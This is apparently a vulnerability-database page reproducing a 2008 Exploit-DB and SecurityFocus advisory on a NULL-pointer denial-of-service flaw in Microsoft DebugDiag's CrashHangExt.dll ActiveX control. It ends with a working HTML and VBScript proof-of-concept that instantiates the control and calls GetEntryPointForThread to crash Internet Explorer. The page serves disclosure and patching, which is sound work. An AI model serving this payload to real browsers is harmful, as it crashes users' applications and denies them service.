header-logo
Suggest Exploit
vendor:
DebugDiag
by:
SecurityFocus
7.5
CVSS
HIGH
Denial of Service
476
CWE
Product Name: DebugDiag
Affected Version From: 1
Affected Version To: 1
Patch Exists: Yes
Related CWE: N/A
CPE: a:microsoft:debugdiag
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Internet Explorer
2008

Microsoft DebugDiag ‘CrashHangExt.dll’ ActiveX Control Denial of Service Vulnerability

Microsoft DebugDiag 'CrashHangExt.dll' ActiveX control is prone to a denial-of-service vulnerability because of a NULL-pointer dereference error. A successful attack allows a remote attacker to crash the application using the ActiveX control (typically Internet Explorer), denying further service to legitimate users.

Mitigation:

Upgrade to the latest version of Microsoft DebugDiag
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/31996/info

Microsoft DebugDiag 'CrashHangExt.dll' ActiveX control is prone to a denial-of-service vulnerability because of a NULL-pointer dereference error.

A successful attack allows a remote attacker to crash the application using the ActiveX control (typically Internet Explorer), denying further service to legitimate users.

Microsoft DebugDiag 1.0 is vulnerable; other versions may also be affected. 

<body> <object classid='clsid:7233D6F8-AD31-440F-BAF0-9E7A292A53DA' id='target' /> </object> <script language='vbscript'> arg1=-2147483647 target.GetEntryPointForThread arg1 </script> </body>